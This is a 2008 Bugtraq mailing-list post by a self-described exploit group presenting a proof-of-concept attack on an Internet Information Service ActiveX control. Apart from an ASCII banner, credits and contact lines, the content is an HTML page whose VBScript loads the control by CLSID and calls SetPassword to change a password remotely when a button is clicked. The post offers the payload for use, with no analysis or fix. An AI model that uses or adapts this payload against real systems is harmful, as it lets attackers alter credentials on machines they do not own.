
Date: 24 Sep 2008 12:40:07 -0000
From: hamedata@...il.com
To: bugtraq@...urityfocus.com
Subject: Internet Information Service remote set password

"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""                                  
"""  :::::: ::   ::       ::        ::  ::  ::::        """
"""  ::      :: ::        :: :::::: .. ::::   ::        """
"""  :::::    :::   ::::: :: ::  :: ::  ::  ::::        """
"""  ::      :: ::  ::  : :: ::  :: ::  ::    ::        """
"""  :::::: ::   :: ::::: :: :::::: ::  ::  :::: rs.ir  """
"""                 ::                                  """
"""                                                     """
"""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
   


# Tilte: Internet Information Service set password

# Exp0iters member (order by alphabet) .........: [Ciph3r,Hamedeta,Rake,Sh3llh3ll,the_Edit0r]
# Author........................................: [hamedata]
# E-mail........................................: [hamedata@...il.com]
# Location .....................................: [Iran]
# Software .....................................: [Internet Information Service] 
# Sp Tanx2 .....................................: [ALL HACKERS]


# Vulnerability: Remote set password



# Part Expl0it & Bug Codes :
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

<html>
<object classid='clsid:C3B32488-AFEC-11D1-9868-00A0C922E703' id='iis' /></object>
<input language=VBScript onclick=try() type=button value='start'>
<script language='vbscript'>
Sub try
iis.SetPassword "exploiters" 
End Sub
</script>
</html>

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

# Part Contact : 

Contact me : hamedata@...il.com
Contact Expl0iters team : the_3dit0r[at]Yahoo[dot]coM

